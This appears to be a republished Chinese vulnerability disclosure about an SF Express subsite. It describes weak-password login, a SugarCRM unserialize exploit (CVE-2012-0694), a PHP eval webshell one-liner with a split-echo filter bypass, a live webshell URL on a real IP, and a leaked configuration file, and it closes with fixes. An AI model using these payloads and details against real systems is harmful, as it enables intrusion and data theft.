好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

顺丰速运某分站PHP代码执行漏洞及修复 - 网站安

其实是 漏洞 合集啊,包括PHP代码执行,信息泄漏等,导致拿到WebShell。 1. DNS域传送漏洞         2. PHP代码执行漏洞 把整理出来的IP扔到NMAP里,找到了一些有风险的系统。 地址:http://219.134.187.130:8085/index.php?module=Users&action=Login 弱口令admin/admin进入后台。         进入系统之后发现SugarCRM版本是6.2.3,刚好用上最近的一个Exploit(需用户认证)。 CVE编号:CVE-2012-0694 SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution   于是拿到反弹shell。         在拿到Webshell之前有个小插曲,发现wget命令不能使用,貌似是防火墙禁止服务器外联。不过touch命令可以使用,vi不能用,只能使用echo。于是创建一个1.php的文件,然后echo写入。   touch 1.php echo "<?php eval($_POST[cmd])?>" >> 1.php 但发现每次写入文件之后,$_POST都会被过滤掉,如下图。         于是想可不可以使用XSS的方法(跟gainover学的,参考了http://www.wooyun.org/bugs/wooyun-2012-07854,哈哈)分开写, 于是第一行   echo -n "<?php eval($" >> 1.php 第二行   echo -n "_POST[cmd])?>" >> 1.php           然后用菜刀连上后上传Webshell。 www.2cto.com         Webshell地址http://219.134.187.130:8085/shell.php 暂未删除   数据库 信息         破解 MD5 后,进入招聘网站后台     3.信息泄漏,包括 Oracle 数据库的一些信息。 http://uatmobile.sf-express.com/SFMobile.xml   修复方案: 1. 修改SugarCRM口令。   2. 删除http://uatmobile.sf-express.com/SFMobile.xml文件。   3. 请删除测试时的Webshell http://219.134.187.130:8085/shell.php   4. 服务如果没有用就停掉,数据库和应用分离。   礼物有没有?呵呵,貌似顺丰送礼物是不要快递费的。  

查看更多关于顺丰速运某分站PHP代码执行漏洞及修复 - 网站安的详细内容...

  阅读:35次